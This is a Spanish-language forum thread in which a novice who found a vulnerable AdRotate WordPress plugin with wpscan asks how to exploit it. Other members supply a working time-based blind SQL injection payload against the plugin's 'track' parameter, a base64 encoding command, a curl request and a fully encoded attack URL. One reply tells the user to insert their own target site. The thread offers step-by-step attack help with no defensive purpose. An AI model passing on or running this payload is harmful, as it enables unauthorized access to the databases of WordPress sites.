Buenas , hola a todos ! (Perdona si el post no va en el sitio adecuado )
Pues tenia una duda con una inyección sql en wordpress. Analizando con wpscan veo que hay un plugin vulnerable . En el wpscan me sale esto :
*Title:Adrotate plugin <= 3.6.5 SQL Injection Vulnerability
*Reference: http:www.exploit-db.com/exploits/18114/
En la pagina de exploit-db me sale el codigo vulnerable pero realmente no se que hacer con eso , si alguien me puede echar una mano o pasarme algun tutorial para leer e informarme se lo agradeceria
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
Buenas , hola a todos ! (Perdona si el post no va en el sitio adecuado )
Pues tenia una duda con una inyección sql en wordpress. Analizando con wpscan veo que hay un plugin vulnerable . En el wpscan me sale esto :
*Title:Adrotate plugin <= 3.6.5 SQL Injection Vulnerability
*Reference: http:www.exploit-db.com/exploits/18114/
En la pagina de exploit-db me sale el codigo vulnerable pero realmente no se que hacer con eso , si alguien me puede echar una mano o pasarme algun tutorial para leer e informarme se lo agradeceria
payload="1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#"
encoded=`echo -n "1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#" | base64 -w 0`
curl http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=$encoded
es facil la vulnerabilidad esta en la variable track. ahi inyecta el payload encodeado en base64
Me puedes hacer un pequeño tutorial si no es mucha molestia , es que ahora no entiendo nada
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
Me puedes hacer un pequeño tutorial si no es mucha molestia , es que ahora no entiendo nada
O tambien podrias ponerte a estudiar sqli para que entiendas ese payload ;)
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
Me puedes hacer un pequeño tutorial si no es mucha molestia , es que ahora no entiendo nada
O tambien podrias ponerte a estudiar sqli para que entiendas ese payload ;)
jajaja tenia planeado decir lo mismo pero no quería ser duro xD
Perdon no se me ha ententido muy bien , eh parecido un poco lammer xD, decia algun tutorial o por donde comenzar para aprender .
saludos compa;
haz lo siguiente:
http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkj
http://www.AQUITUWEB.com/wp-content/plugins/adrotate/adrotate-out.php?track= <-- AQUI ESTO: MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkj
ESTO: MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkj
ES ESTO: 1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#
lo cual esta encodeado en based64
si no entendistes como funciona..... vas a tener que leeerrr y mucho..... o mejor te dedicas a otras cosas... :o
saludos;